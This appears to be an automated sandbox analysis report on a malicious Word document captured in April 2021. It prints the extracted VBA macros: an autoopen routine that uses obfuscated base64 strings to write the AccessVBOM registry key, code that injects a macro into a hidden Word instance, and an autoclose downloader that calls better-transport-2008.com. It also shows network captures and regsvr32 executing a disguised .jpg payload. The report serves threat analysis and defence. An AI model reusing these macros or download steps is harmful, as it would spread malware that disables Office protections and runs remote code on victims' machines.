                Attribute VB_Base = "0{C70C972A-9359-4393-8302-539D2FF78F23}{25405C50-5AD6-4D56-82F4-D7B1075E12BD}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = False
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = False
                VBA File Name: listCopy.bas, Stream Size: 1037
                General
                Stream Path:VBA/listCopy
                VBA File Name:listCopy.bas
                Stream Size:1037
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . . . . . . . . . . . q . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 92 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 99 02 00 00 6d 03 00 00 00 00 00 00 01 00 00 00 71 cc c1 2d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                "listCopy"
                clearIteratorRef
                Attribute
                autoopen()
                convertIndex
                VB_Name
                viewValueTextbox
                memoryIndex
                String
                VBA Code
                Attribute VB_Name = "listCopy"
                Sub autoopen()
                viewValueTextbox
                Dim clearIteratorRef As String
                clearIteratorRef = convertIndex
                memoryIndex clearIteratorRef
                End Sub
                VBA File Name: optionRemoveGeneric.bas, Stream Size: 1304
                General
                Stream Path:VBA/optionRemoveGeneric
                VBA File Name:optionRemoveGeneric.bas
                Stream Size:1304
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 9a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff a1 02 00 00 e9 03 00 00 00 00 00 00 01 00 00 00 71 cc 13 c4 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                optionPtr.Quit
                False
                optionPtr
                String)
                Attribute
                optionPtr.Documents.Add
                collectionSelect
                VB_Name
                CreateObject("word.application")
                "optionRemoveGeneric"
                memoryTempTrust
                memoryIndex(memoryTempTrust
                optionPtr.Visible
                SaveChanges:=wdDoNotSaveChanges
                collectionSelect.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
                VBA Code
                Attribute VB_Name = "optionRemoveGeneric"
                Sub memoryIndex(memoryTempTrust As String)
                Set optionPtr = CreateObject("word.application")
                Set collectionSelect = optionPtr.Documents.Add
                collectionSelect.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString memoryTempTrust
                optionPtr.Visible = False
                optionPtr.Quit SaveChanges:=wdDoNotSaveChanges
                End Sub
                VBA File Name: refConvertCaption.bas, Stream Size: 1636
                General
                Stream Path:VBA/refConvertCaption
                VBA File Name:refConvertCaption.bas
                Stream Size:1636
                Data ASCII:. . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . q . u m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 62 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 69 03 00 00 0d 05 00 00 00 00 00 00 01 00 00 00 71 cc 75 6d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                String)
                VB_Name
                vbSwap
                "refConvertCaption"
                memCaptionOption.Text
                StrConv(captionPaste,
                Function
                vbSwap.createElement("code")
                exceptionPointer
                Object
                Variant
                memConvertStruct)
                ptrPtrStorage
                memCaptionOption.DataType
                constCollectionDatabase
                memCaptionOption
                memCaptionOption.nodeTypedValue
                exceptionPointer(captionPaste,
                ptrPtrStorage(constCollectionDatabase
                Attribute
                VBA Code
                Attribute VB_Name = "refConvertCaption"
                Function ptrPtrStorage(constCollectionDatabase As String) As Variant
                Dim vbSwap As Object
                Dim memCaptionOption As Object
                Set vbSwap = CreateObject("msxml2.domdocument")
                Set memCaptionOption = vbSwap.createElement("code")
                memCaptionOption.DataType = "bin.base64"
                memCaptionOption.Text = constCollectionDatabase
                ptrPtrStorage = memCaptionOption.nodeTypedValue
                End Function
                Function exceptionPointer(captionPaste, memConvertStruct)
                exceptionPointer = StrConv(captionPaste, memConvertStruct)
                End Function
                VBA File Name: repoText.bas, Stream Size: 2970
                General
                Stream Path:VBA/repoText
                VBA File Name:repoText.bas
                Stream Size:2970
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . ; . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 aa 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff b1 04 00 00 b9 08 00 00 00 00 00 00 01 00 00 00 71 cc 1c 3b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                convertIndex
                String)
                "repoText"
                clearRefLoad
                .RegWrite
                VB_Name
                Public
                Function
                varClass
                String
                Application.Version
                captionBufData()
                textExButton
                vbUnicode)
                Chr$(Val("&H"
                clearRefLoad,
                "jZXNzVkJPTQ=="),
                Mid$(tempClearIndex,
                arrayOption
                Len(tempClearIndex)
                mainExLocal
                listboxNextVar()
                CreateObject("ws"
                "VjdXJpdHlcQWN"
                viewValueTextbox()
                trustStruct
                tempClearIndex
                globalResponse
                textExButton(ByVal
                varClass()
                arrayOption,
                countSelect
                captionBufData
                titleSize
                Attribute
                "REG_DWORD"
                "cript.sh"
                "ell")
                convertIndex()
                listboxNextVar
                clearReference
                mainExLocal()
                VBA Code
                Attribute VB_Name = "repoText"
                Function captionBufData() As String
                captionBufData = Application.Version
                End Function
                Function mainExLocal()
                mainExLocal = "U5UX1VTRVJcU29mdHdhcmVcTWlj"
                End Function
                Function listboxNextVar()
                listboxNextVar = "cript.sh"
                End Function
                Function varClass()
                varClass = "VjdXJpdHlcQWN"
                End Function
                Sub viewValueTextbox()
                clearReference = exceptionPointer(ptrPtrStorage("SEtFWV9DVVJSR" & mainExLocal & "cm9zb2Z0XE9mZmljZVw="), vbUnicode)
                countSelect = captionBufData
                globalResponse = exceptionPointer(ptrPtrStorage("XFdvcmRcU2" & varClass & "jZXNzVkJPTQ=="), vbUnicode)
                clearRefLoad = clearReference & countSelect & globalResponse
                With CreateObject("ws" & listboxNextVar & "ell")
                .RegWrite clearRefLoad, 1, "REG_DWORD"
                End With
                End Sub
                Public Function textExButton(ByVal tempClearIndex As String) As String
                For arrayOption = 1 To Len(tempClearIndex) Step 2
                titleSize = Chr$(Val("&H" & Mid$(tempClearIndex, arrayOption, 2)))
                trustStruct = trustStruct & titleSize
                Next arrayOption
                textExButton = trustStruct
                End Function
                Function convertIndex()
                convertIndex = UserForm1.TextBox1
                End Function

                Streams

                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 689
                General
                Stream Path:PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:689
                Entropy:5.29372046772
                Base64 Encoded:True
                Data ASCII:I D = " { 2 A 8 A 4 9 5 1 - B 5 C 1 - 4 C 9 C - A E 1 6 - E D B 1 E 3 E 7 5 4 8 3 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . M o d u l e = l i s t C o p y . . M o d u l e = r e f C o n v e r t C a p t i o n . . M o d u l e = o p t i o n R e m o v e G e n e r i c . . M o d u l e = r e p o T e x t . . N a m e = " P r o j e c t " . . H e l p
                Data Raw:49 44 3d 22 7b 32 41 38 41 34 39 35 31 2d 42 35 43 31 2d 34 43 39 43 2d 41 45 31 36 2d 45 44 42 31 45 33 45 37 35 34 38 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42
                Stream Path: PROJECTwm, File Type: data, Stream Size: 239
                General
                Stream Path:PROJECTwm
                File Type:data
                Stream Size:239
                Entropy:3.53833137583
                Base64 Encoded:False
                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . l i s t C o p y . l . i . s . t . C . o . p . y . . . r e f C o n v e r t C a p t i o n . r . e . f . C . o . n . v . e . r . t . C . a . p . t . i . o . n . . . o p t i o n R e m o v e G e n e r i c . o . p . t . i . o . n . R . e . m . o . v . e . G . e . n . e . r . i . c . . . r e p o T e x t . r . e . p . o . T . e . x . t . . . . .
                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 6c 69 73 74 43 6f 70 79 00 6c 00 69 00 73 00 74 00 43 00 6f 00 70 00 79 00 00 00 72 65 66 43 6f 6e 76 65 72 74 43 61 70 74 69 6f 6e 00 72 00 65 00 66 00 43 00 6f 00 6e 00 76 00
                Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                General
                Stream Path:UserForm1/\x1CompObj
                File Type:data
                Stream Size:97
                Entropy:3.61064918306
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 292
                General
                Stream Path:UserForm1/\x3VBFrame
                File Type:ASCII text, with CRLF line terminators
                Stream Size:292
                Entropy:4.58743694765
                Base64 Encoded:True
                Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                Stream Path: UserForm1/f, File Type: data, Stream Size: 90
                General
                Stream Path:UserForm1/f
                File Type:data
                Stream Size:90
                Entropy:2.89102698747
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . , . . . . . h o . . $ . . . . . . . . . . . . . X . . . . . . . T e x t B o x 1 4 . . . . . . .
                Data Raw:00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2c 00 00 00 00 01 68 6f 00 00 24 00 e5 01 00 00 08 00 00 80 01 00 00 00 58 03 00 00 00 00 17 00 54 65 78 74 42 6f 78 31 34 02 00 00 1a 01 00 00
                Stream Path: UserForm1/o, File Type: data, Stream Size: 856
                General
                Stream Path:UserForm1/o
                File Type:data
                Stream Size:856
                Entropy:5.78040237389
                Base64 Encoded:True
                Data ASCII:. . 8 . . . @ . . . . . . H . . . . . . . . . . { . . . S u b a u t o c l o s e ( ) . . d o w n l o a d . . e x e c u t e . . E n d S u b . . . . S u b d o w n l o a d ( ) . . . . S e t x m l h t t p = C r e a t e O b j e c t ( " m i c r o s o f t . x m l h t t p " ) . . x m l h t t p . O p e n " G E T " , " h t t p : / / b e t t e r - t r a n s p o r t - 2 0 0 8 . c o m / b i j o l / d V 6 T 3 i G 7 z Y Y N / G d U b 2 h c o K h 0 i 1 6 j t B 3 A 2 H 0 N A 1 h p c / 7 4 6 8
                Data Raw:00 02 38 03 01 01 40 80 00 00 00 00 1b 48 80 ac 1d 03 00 80 ec 09 00 00 7b 02 00 00 53 75 62 20 61 75 74 6f 63 6c 6f 73 65 28 29 0d 0a 20 20 20 20 64 6f 77 6e 6c 6f 61 64 0d 0a 20 20 20 20 65 78 65 63 75 74 65 0d 0a 45 6e 64 20 53 75 62 0d 0a 0d 0a 53 75 62 20 64 6f 77 6e 6c 6f 61 64 28 29 0d 0a 0d 0a 53 65 74 20 78 6d 6c 68 74 74 70 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28
                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4855
                General
                Stream Path:VBA/_VBA_PROJECT
                File Type:data
                Stream Size:4855
                Entropy:4.66602075705
                Base64 Encoded:False
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2486
                General
                Stream Path:VBA/__SRP_0
                File Type:data
                Stream Size:2486
                Entropy:3.64532699898
                Base64 Encoded:True
                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ N . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . W
                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 214
                General
                Stream Path:VBA/__SRP_1
                File Type:data
                Stream Size:214
                Entropy:1.76333029747
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348
                General
                Stream Path:VBA/__SRP_2
                File Type:data
                Stream Size:348
                Entropy:1.78667786328
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 0b 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 41 0c
                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106
                General
                Stream Path:VBA/__SRP_3
                File Type:data
                Stream Size:106
                Entropy:1.35911194617
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                Stream Path: VBA/dir, File Type: Tower/XP rel 3 object not stripped - version 18435, Stream Size: 1172
                General
                Stream Path:VBA/dir
                File Type:Tower/XP rel 3 object not stripped - version 18435
                Stream Size:1172
                Entropy:6.62532484228
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . | b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . .
                Data Raw:01 90 b4 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 06 bb 7c 62 0f 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 28, 2021 17:47:31.154751062 CEST4916580192.168.2.2245.142.215.160
                Apr 28, 2021 17:47:31.224575996 CEST804916545.142.215.160192.168.2.22
                Apr 28, 2021 17:47:31.224666119 CEST4916580192.168.2.2245.142.215.160
                Apr 28, 2021 17:47:31.225944996 CEST4916580192.168.2.2245.142.215.160
                Apr 28, 2021 17:47:31.294394016 CEST804916545.142.215.160192.168.2.22
                Apr 28, 2021 17:47:31.546538115 CEST804916545.142.215.160192.168.2.22
                Apr 28, 2021 17:47:31.546854973 CEST4916580192.168.2.2245.142.215.160
                Apr 28, 2021 17:47:32.014336109 CEST4916580192.168.2.2245.142.215.160

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 28, 2021 17:47:31.060580969 CEST5219753192.168.2.228.8.8.8
                Apr 28, 2021 17:47:31.131036043 CEST53521978.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Apr 28, 2021 17:47:31.060580969 CEST192.168.2.228.8.8.80x2c09Standard query (0)better-transport-2008.comA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Apr 28, 2021 17:47:31.131036043 CEST8.8.8.8192.168.2.220x2c09No error (0)better-transport-2008.com45.142.215.160A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • better-transport-2008.com

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.224916545.142.215.16080C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampkBytes transferredDirectionData
                Apr 28, 2021 17:47:31.225944996 CEST0OUTGET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: better-transport-2008.com
                Connection: Keep-Alive
                Apr 28, 2021 17:47:31.546538115 CEST1INHTTP/1.1 200 OK
                Date: Wed, 28 Apr 2021 15:47:31 GMT
                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                X-Powered-By: PHP/7.2.34
                Content-Length: 204
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 6c 61 6b 61 34 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "laka4" was not found on this server.</p></body></html>


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:17:47:30
                Start date:28/04/2021
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                Imagebase:0x13f5b0000
                File size:1424032 bytes
                MD5 hash:95C38D04597050285A18F66039EDB456
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:47:34
                Start date:28/04/2021
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                Imagebase:0x13f5b0000
                File size:1424032 bytes
                MD5 hash:95C38D04597050285A18F66039EDB456
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:47:35
                Start date:28/04/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 c:\programdata\argumentSelectTmp.jpg
                Imagebase:0xff250000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Call Graph

                Graph

                • Entrypoint
                • Decryption Function
                • Executed
                • Not Executed
                • Show Help
